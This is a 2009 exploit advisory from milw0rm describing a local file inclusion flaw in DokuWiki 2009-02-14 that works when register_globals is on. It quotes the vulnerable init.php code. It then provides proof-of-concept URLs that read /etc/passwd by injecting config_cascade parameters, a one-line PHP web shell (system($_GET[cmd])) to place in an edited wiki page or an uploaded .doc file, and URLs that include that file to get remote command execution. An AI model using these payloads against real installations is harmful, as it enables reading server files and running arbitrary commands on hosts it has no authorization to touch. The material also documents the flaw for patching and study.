# Author_ girex
# Homepage_ girex.altervista.org

# CMS_ Dokuwiki
# Homepage_ dokuwiki.org

# Affected versions_ 2009-02-14
                     rc2009-02-06
                     rc2009-01-30

# Bug_ Local file inclusion
# Need_ register_globals = On


# Vuln description_
# File: /inc/init.php

// if available load a preload config file
$preload = fullpath(dirname(__FILE__)).'/preload.php';
if (@file_exists($preload)) include($preload);

...

//set the configuration cascade - but only if its not already been set in preload.php
global $config_cascade;
if (empty($config_cascade)) {
    $config_cascade = array(
        'main' => array(
            'default' => array(DOKU_CONF.'dokuwiki.php'),
            'local' => array(DOKU_CONF.'local.php'),
            'protected' => array(DOKU_CONF.'local.protected.php'),
        ),

...

// load the global config file(s)
foreach (array('default','local','protected') as $config_group) {
    if (empty($config_cascade['main'][$config_group])) continue;
    foreach ($config_cascade['main'][$config_group] as $config_file) {
        if (@file_exists($config_file)) {
            include($config_file);
        }
    }
}


# The file preload.php doesn't exist (so it seems, for the affected versions).
# So nothing initialises $config_cascade before the empty() check, and its arrays can be set via register_globals;
# the default cascade is then never assigned, and the supplied paths reach the include() in the loop above.
# It's not an RFI, because of the use of the file_exists function.

# First of all you can check the dokuwiki's version here:
# /[host]/[path]/VERSION
# and check if it's a vulnerable version

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd
# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./README

# Note:
# You can obtain a remote command execution if you can edit the content of a page
# Just insert your php code into it like: <?php system($_GET[cmd]); ?>
# And include it:

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt

# Or you can check if you have permissions to upload file via:
# [host]/[path]/lib/exe/mediamanager.php

# If so, upload your file with .doc extension then include it:

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc

# milw0rm.com [2009-05-26]
Dokuwiki 20090214 Local File Inclusion Vulnerability girex 05/26/2009